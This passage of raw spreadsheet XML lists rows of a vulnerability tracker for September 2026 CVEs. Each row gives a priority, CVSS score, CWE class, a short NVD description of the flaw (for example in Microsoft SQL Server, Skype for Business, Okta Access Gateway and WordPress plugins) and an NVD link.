/><c r="L1060" s="5" t="inlineStr" /><c r="M1060" s="5" t="inlineStr" /><c r="N1060" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1060" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1060" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1060" s="5" t="inlineStr" /><c r="R1060" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1060" s="5" t="inlineStr"><is><t>An issue in OpenDDS 3.33.x allows a local attacker to cause a denial of service via the verify function in the SIgnedDocument module</t></is></c><c r="T1060" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52486</t></is></c></row><row r="1061"><c r="A1061" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1061" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1061" s="5" t="inlineStr"><is><t>CVE-2026-69469</t></is></c><c r="D1061" s="5" t="n"><v>6.6</v></c><c r="E1061" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1061" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1061" s="5" t="inlineStr" /><c r="H1061" s="5" t="n"><v>0.004</v></c><c r="I1061" s="5" t="inlineStr" /><c r="J1061" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K106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61" s="5" t="inlineStr" /><c r="M1061" s="5" t="inlineStr" /><c r="N1061" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1061" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1061" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1061" s="5" t="inlineStr" /><c r="R1061" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S1061" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1061" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t></is></c></row><row r="1062"><c r="A1062" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1062" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1062" s="5" t="inlineStr"><is><t>CVE-2026-78545</t></is></c><c r="D1062" s="5" t="n"><v>6.6</v></c><c r="E1062" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1062" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1062" s="5" t="inlineStr" /><c r="H1062" s="5" t="n"><v>0.004</v></c><c r="I1062" s="5" t="inlineStr" /><c r="J1062" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1062" s="5" t="inlineStr" /><c r="L1062" s="5" t="inlineStr" /><c r="M1062" s="5" t="inlineStr" /><c r="N1062" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1062" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1062" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1062" s="5" t="inlineStr" /><c r="R1062" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1062" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t></is></c><c r="T1062" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t></is></c></row><row r="1063"><c r="A1063" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1063" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1063" s="5" t="inlineStr"><is><t>CVE-2026-78550</t></is></c><c r="D1063" s="5" t="n"><v>6.6</v></c><c r="E1063" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1063" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1063" s="5" t="inlineStr" /><c r="H1063" s="5" t="n"><v>0.004</v></c><c r="I1063" s="5" t="inlineStr" /><c r="J1063" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1063" s="5" t="inlineStr" /><c r="L1063" s="5" t="inlineStr" /><c r="M1063" s="5" t="inlineStr" /><c r="N1063" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1063" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1063" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1063" s="5" t="inlineStr" /><c r="R1063" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S1063" s="5" t="inlineStr"><is><t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t></is></c><c r="T1063" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t></is></c></row><row r="1064"><c r="A1064" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1064" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1064" s="5" t="inlineStr"><is><t>CVE-2026-17509</t></is></c><c r="D1064" s="5" t="n"><v>6.5</v></c><c r="E1064" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1064" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1064" s="5" t="inlineStr" /><c r="H1064" s="5" t="n"><v>0.002</v></c><c r="I1064" s="5" t="inlineStr" /><c r="J1064" s="5" t="inlineStr" /><c r="K1064" s="5" t="inlineStr" /><c r="L1064" s="5" t="inlineStr" /><c r="M1064" s="5" t="inlineStr" /><c r="N1064" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1064" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1064" s="5" t="inlineStr" /><c r="R1064" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1064" s="5" t="inlineStr"><is><t>The WPML Multilingual CMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘elementIds’ parameter in all versions up to, and including, 4.9.5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vulnerability is exploitable due to an authorization bypass where the registered authorization callback fails to execute, allowing any authenticated user regardless of role to access administrative translation functionalities.</t></is></c><c r="T1064" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17509</t></is></c></row><row r="1065"><c r="A1065" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1065" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1065" s="5" t="inlineStr"><is><t>CVE-2026-18021</t></is></c><c r="D1065" s="5" t="n"><v>6.5</v></c><c r="E1065" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1065" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1065" s="5" t="inlineStr" /><c r="H1065" s="5" t="n"><v>0.003</v></c><c r="I1065" s="5" t="inlineStr" /><c r="J1065" s="5" t="inlineStr" /><c r="K1065" s="5" t="inlineStr" /><c r="L1065" s="5" t="inlineStr" /><c r="M1065" s="5" t="inlineStr" /><c r="N1065" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1065" s="5" t="inlineStr" /><c r="R1065" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1065" s="5" t="inlineStr"><is><t>The The Beaver Builder Page Builder – Drag and Drop Website Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.10.3.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t></is></c><c r="T1065" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18021</t></is></c></row><row r="1066"><c r="A1066" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1066" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1066" s="5" t="inlineStr"><is><t>CVE-2026-44766</t></is></c><c r="D1066" s="5" t="n"><v>6.5</v></c><c r="E1066" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1066" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1066" s="5" t="inlineStr" /><c r="H1066" s="5" t="n"><v>0.002</v></c><c r="I1066" s="5" t="inlineStr" /><c r="J1066" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1066" s="5" t="inlineStr" /><c r="L1066" s="5" t="inlineStr" /><c r="M1066" s="5" t="inlineStr" /><c r="N1066" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1066" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1066" s="5" t="inlineStr" /><c r="R1066" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S1066" s="5" t="inlineStr"><is><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is></c><c r="T1066" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t></is></c></row><row r="1067"><c r="A1067" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1067" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1067" s="5" t="inlineStr"><is><t>CVE-2026-53637</t></is></c><c r="D1067" s="5" t="n"><v>6.5</v></c><c r="E1067" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1067" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1067" s="5" t="inlineStr" /><c r="H1067" s="5" t="n"><v>0.003</v></c><c r="I1067" s="5" t="inlineStr" /><c r="J1067" s="5" t="inlineStr" /><c r="K1067" s="5" t="inlineStr" /><c r="L1067" s="5" t="inlineStr" /><c r="M1067" s="5" t="inlineStr" /><c r="N1067" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1067" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1067" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1067" s="5" t="inlineStr" /><c r="R1067" s="5" t="inlineStr"><is><t>CWE-672, CWE-841</t></is></c><c r="S1067" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Versions 2.0.0 through 2.0.17, 2.1.0 through 2.1.14, and 2.2.0 through 2.2.5 contain an improper workflow enforcement vulnerability in the cart `FormComponent`. When an order is completed while its cart page remains open, the stale LiveComponent does not detect the order’s changed state and continues to permit cart actions, allowing an authenticated customer to modify or permanently delete an already completed order. Versions 2.0.18, 2.1.15, and 2.2.6 contain a patch. As a workaround, deployments can copy the patched `FormComponent` into the application's `src/` directory and override the `sylius_shop.twig.component.cart.form` service definition to use that class.</t></is></c><c r="T1067" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53637</t></is></c></row><row r="1068"><c r="A1068" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1068" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1068" s="5" t="inlineStr"><is><t>CVE-2026-55256</t></is></c><c r="D1068" s="5" t="n"><v>6.5</v></c><c r="E1068" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1068" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1068" s="5" t="inlineStr" /><c r="H1068" s="5" t="n"><v>0.003</v></c><c r="I1068" s="5" t="inlineStr" /><c r="J1068" s="5" t="inlineStr" /><c r="K1068" s="5" t="inlineStr" /><c r="L1068" s="5" t="inlineStr" /><c r="M1068" s="5" t="inlineStr" /><c r="N1068" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1068" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1068" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1068" s="5" t="inlineStr" /><c r="R1068" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1068" s="5" t="inlineStr"><is><t>In parsePartHeaders of multiple files, there is a possible persistent denial of service due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1068" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55256</t></is></c></row><row r="1069"><c r="A1069" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1069" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1069" s="5" t="inlineStr"><is><t>CVE-2026-58649</t></is></c><c r="D1069" s="5" t="n"><v>6.5</v></c><c r="E1069" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1069" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1069" s="5" t="inlineStr" /><c r="H1069" s="5" t="n"><v>0.003</v></c><c r="I1069" s="5" t="inlineStr" /><c r="J1069" s="5" t="inlineStr" /><c r="K1069" s="5" t="inlineStr" /><c r="L1069" s="5" t="inlineStr" /><c r="M1069" s="5" t="inlineStr" /><c r="N1069" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1069" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1069" s="5" t="inlineStr" /><c r="R1069" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1069" s="5" t="inlineStr"><is><t>Origin validation error in .NET allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1069" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58649</t></is></c></row><row r="1070"><c r="A1070" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1070" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1070" s="5" t="inlineStr"><is><t>CVE-2026-62437</t></is></c><c r="D1070" s="5" t="n"><v>6.5</v></c><c r="E1070" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1070" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1070" s="5" t="inlineStr" /><c r="H1070" s="5" t="n"><v>0.001</v></c><c r="I1070" s="5" t="inlineStr" /><c r="J1070" s="5" t="inlineStr" /><c r="K1070" s="5" t="inlineStr" /><c r="L1070" s="5" t="inlineStr" /><c r="M1070" s="5" t="inlineStr" /><c r="N1070" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1070" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1070" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1070" s="5" t="inlineStr" /><c r="R1070" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1070" s="5" t="inlineStr"><is><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is></c><c r="T1070" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62437</t></is></c></row><row r="1071"><c r="A1071" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1071" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1071" s="5" t="inlineStr"><is><t>CVE-2026-62762</t></is></c><c r="D1071" s="5" t="n"><v>6.5</v></c><c r="E1071" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1071" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1071" s="5" t="inlineStr" /><c r="H1071" s="5" t="n"><v>0.008</v></c><c r="I1071" s="5" t="inlineStr" /><c r="J1071" s="5" t="inlineStr" /><c r="K1071" s="5" t="inlineStr" /><c r="L1071" s="5" t="inlineStr" /><c r="M1071" s="5" t="inlineStr" /><c r="N1071" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1071" s="5" t="inlineStr" /><c r="R1071" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1071" s="5" t="inlineStr"><is><t>Null pointer dereference in Active Directory Domain Services allows an authorized attacker to deny service over a network.</t></is></c><c r="T1071" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62762</t></is></c></row><row r="1072"><c r="A1072" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1072" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1072" s="5" t="inlineStr"><is><t>CVE-2026-62801</t></is></c><c r="D1072" s="5" t="n"><v>6.5</v></c><c r="E1072" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1072" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1072" s="5" t="inlineStr" /><c r="H1072" s="5" t="n"><v>0.005</v></c><c r="I1072" s="5" t="inlineStr" /><c r="J1072" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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72" s="5" t="inlineStr" /><c r="M1072" s="5" t="inlineStr" /><c r="N1072" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1072" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1072" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1072" s="5" t="inlineStr" /><c r="R1072" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1072" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1072" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t></is></c></row><row r="1073"><c r="A1073" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1073" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1073" s="5" t="inlineStr"><is><t>CVE-2026-64918</t></is></c><c r="D1073" s="5" t="n"><v>6.5</v></c><c r="E1073" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1073" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1073" s="5" t="inlineStr" /><c r="H1073" s="5" t="n"><v>0.005</v></c><c r="I1073" s="5" t="inlineStr" /><c r="J1073" s="5" t="inlineStr" /><c r="K1073" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1073" s="5" t="inlineStr" /><c r="M1073" s="5" t="inlineStr" /><c r="N1073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1073" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1073" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1073" s="5" t="inlineStr" /><c r="R1073" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1073" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1073" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t></is></c></row><row r="1074"><c r="A1074" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1074" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1074" s="5" t="inlineStr"><is><t>CVE-2026-66303</t></is></c><c r="D1074" s="5" t="n"><v>6.5</v></c><c r="E1074" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1074" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1074" s="5" t="inlineStr" /><c r="H1074" s="5" t="n"><v>0.008</v></c><c r="I1074" s="5" t="inlineStr" /><c r="J1074" s="5" t="inlineStr" /><c r="K1074" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1074" s="5" t="inlineStr" /><c r="M1074" s="5" t="inlineStr" /><c r="N1074" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1074" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1074" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1074" s="5" t="inlineStr" /><c r="R1074" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1074" s="5" t="inlineStr"><is><t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1074" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t></is></c></row><row r="1075"><c r="A1075" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1075" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1075" s="5" t="inlineStr"><is><t>CVE-2026-66306</t></is></c><c r="D1075" s="5" t="n"><v>6.5</v></c><c r="E1075" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1075" s="5" t="inlineStr" /><c r="H1075" s="5" t="n"><v>0.005</v></c><c r="I1075" s="5" t="inlineStr" /><c r="J1075" s="5" t="inlineStr" /><c r="K1075" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1075" s="5" t="inlineStr" /><c r="M1075" s="5" t="inlineStr" /><c r="N1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1075" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1075" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1075" s="5" t="inlineStr" /><c r="R1075" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1075" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1075" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t></is></c></row><row r="1076"><c r="A1076" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1076" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1076" s="5" t="inlineStr"><is><t>CVE-2026-66308</t></is></c><c r="D1076" s="5" t="n"><v>6.5</v></c><c r="E1076" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1076" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1076" s="5" t="inlineStr" /><c r="H1076" s="5" t="n"><v>0.006</v></c><c r="I1076" s="5" t="inlineStr" /><c r="J1076" s="5" t="inlineStr" /><c r="K1076" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1076" s="5" t="inlineStr" /><c r="M1076" s="5" t="inlineStr" /><c r="N1076" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1076" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1076" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1076" s="5" t="inlineStr" /><c r="R1076" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1076" s="5" t="inlineStr"><is><t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1076" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t></is></c></row><row r="1077"><c r="A1077" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1077" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1077" s="5" t="inlineStr"><is><t>CVE-2026-66816</t></is></c><c r="D1077" s="5" t="n"><v>6.5</v></c><c r="E1077" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1077" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1077" s="5" t="inlineStr" /><c r="H1077" s="5" t="n"><v>0.007</v></c><c r="I1077" s="5" t="inlineStr" /><c r="J1077" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1077" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1077" s="5" t="inlineStr" /><c r="M1077" s="5" t="inlineStr" /><c r="N1077" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1077" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1077" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1077" s="5" t="inlineStr" /><c r="R1077" s="5" t="inlineStr"><is><t>CWE-778</t></is></c><c r="S1077" s="5" t="inlineStr"><is><t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t></is></c><c r="T1077" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t></is></c></row><row r="1078"><c r="A1078" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1078" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1078" s="5" t="inlineStr"><is><t>CVE-2026-67369</t></is></c><c r="D1078" s="5" t="n"><v>6.5</v></c><c r="E1078" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1078" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1078" s="5" t="inlineStr" /><c r="H1078" s="5" t="n"><v>0.007</v></c><c r="I1078" s="5" t="inlineStr" /><c r="J1078" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1078" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1078" s="5" t="inlineStr" /><c r="M1078" s="5" t="inlineStr" /><c r="N1078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1078" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1078" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1078" s="5" t="inlineStr" /><c r="R1078" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1078" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1078" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t></is></c></row><row r="1079"><c r="A1079" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1079" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1079" s="5" t="inlineStr"><is><t>CVE-2026-67383</t></is></c><c r="D1079" s="5" t="n"><v>6.5</v></c><c r="E1079" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1079" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1079" s="5" t="inlineStr" /><c r="H1079" s="5" t="n"><v>0.01</v></c><c r="I1079" s="5" t="inlineStr" /><c r="J1079" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1079" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1079" s="5" t="inlineStr" /><c r="M1079" s="5" t="inlineStr" /><c r="N1079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1079" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1079" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1079" s="5" t="inlineStr" /><c r="R1079" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1079" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1079" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t></is></c></row><row r="1080"><c r="A1080" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1080" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1080" s="5" t="inlineStr"><is><t>CVE-2026-67386</t></is></c><c r="D1080" s="5" t="n"><v>6.5</v></c><c r="E1080" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1080" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1080" s="5" t="inlineStr" /><c r="H1080" s="5" t="n"><v>0.007</v></c><c r="I1080" s="5" t="inlineStr" /><c r="J1080" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1080" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1080" s="5" t="inlineStr" /><c r="M1080" s="5" t="inlineStr" /><c r="N1080" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1080" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1080" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1080" s="5" t="inlineStr" /><c r="R1080" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1080" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1080" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t></is></c></row><row r="1081"><c r="A1081" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1081" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1081" s="5" t="inlineStr"><is><t>CVE-2026-67389</t></is></c><c r="D1081" s="5" t="n"><v>6.5</v></c><c r="E1081" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1081" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1081" s="5" t="inlineStr" /><c r="H1081" s="5" t="n"><v>0.007</v></c><c r="I1081" s="5" 